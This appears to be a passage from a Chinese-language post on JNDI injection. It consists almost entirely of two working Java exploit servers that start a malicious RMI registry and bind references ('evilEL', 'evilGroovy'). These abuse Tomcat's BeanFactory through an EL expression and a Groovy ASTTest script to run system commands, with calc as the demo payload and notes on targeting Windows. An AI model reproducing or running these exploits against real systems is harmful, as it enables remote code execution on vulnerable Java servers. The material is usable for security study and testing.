packagecom.jndi;importcom.sun.jndi.rmi.registry.ReferenceWrapper;importorg.apache.naming.ResourceRef;importjavax.naming.StringRefAddr;importjava.rmi.registry.LocateRegistry;importjava.rmi.registry.Registry;publicclassServer{publicstaticvoidmain(String[]args)throwsException{System.out.println("Creating evil RMI registry on port 1097");Registryregistry=LocateRegistry.createRegistry(1097);//prepare payload that exploits unsafe reflection in org.apache.naming.factory.BeanFactoryResourceRefref=newResourceRef("javax.el.ELProcessor",null,"","",true,"org.apache.naming.factory.BeanFactory",null);//redefine a setter name for the 'x' property from 'setX' to 'eval', see BeanFactory.getObjectInstance coderef.add(newStringRefAddr("forceString","x=eval"));//expression language to execute 'nslookup jndi.s.artsploit.com', modify /bin/sh to cmd.exe if you target windowsref.add(newStringRefAddr("x","\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['cmd','/c','calc']).start()\")"));ReferenceWrapperreferenceWrapper=newReferenceWrapper(ref);registry.bind("evilEL",referenceWrapper);}}
除了el表达式之外还有groovy也可以,原理一样,代码如下。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
publicstaticvoidmain(String[]args)throwsException{System.out.println("Creating evil RMI registry on port 1097");Registryregistry=LocateRegistry.createRegistry(1097);ResourceRefref=newResourceRef("groovy.lang.GroovyClassLoader",null,"","",true,"org.apache.naming.factory.BeanFactory",null);ref.add(newStringRefAddr("forceString","x=parseClass"));Stringscript="@groovy.transform.ASTTest(value={\n"+" assert java.lang.Runtime.getRuntime().exec(\"calc\")\n"+"})\n"+"def x\n";ref.add(newStringRefAddr("x",script));ReferenceWrapperreferenceWrapper=newcom.sun.jndi.rmi.registry.ReferenceWrapper(ref);registry.bind("evilGroovy",referenceWrapper);}